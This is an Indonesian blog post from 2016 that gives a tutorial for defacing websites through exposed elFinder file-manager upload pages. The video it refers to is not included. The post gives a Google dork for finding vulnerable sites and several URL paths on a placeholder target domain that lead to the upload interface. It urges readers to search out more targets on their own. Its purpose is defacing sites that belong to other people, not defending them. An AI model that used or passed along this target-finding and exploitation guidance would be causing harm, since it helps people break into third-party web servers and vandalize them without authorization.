Deface Dengan elFinder File Upload [Video]

Monday, July 4, 2016

Deface Dengan elFinder File Upload [Video]

Deface Dengan elFinder File Upload [Video]

Berhubung pas ane gabut, ane iseng2 rekam game pake bandicam, ah tapi dari pada ga ada manfaat, ane bikin deh tutorial "Deface Dengan elFinder File Upload [Video]" ya walaupun itu exploit lama, masih bisa di pakai kok.

Bahan :

Karena di video kaga ane kasih dork dan exploit nya, ane dah bilang mau taruh di sini.


Dork : inurl:"/elfinder/files/" (kembangkan dengan imajinasi vokepers kalian)

Exploit : 

www.sitetarget.co.li/[path]/elfinder/elfinder.html
atau
www.sitetarget.co.li/[path]/elfinder/elfinder.php.html
atau
www.sitetarget.co.li/[path]/elfinder/src/elfinder-src.php.html


Pokonya cari aja deh,jangan jadi pemalas.
Note : Yang di masukin setelah /elfinder/ aja yak

Link Video :


Jangan Lupa, Like + Komen and Subscribe !!

Join Site di Blog Juga ya, aku ga minta uang kok cuma minta itu aja

Related Post

Next
Previous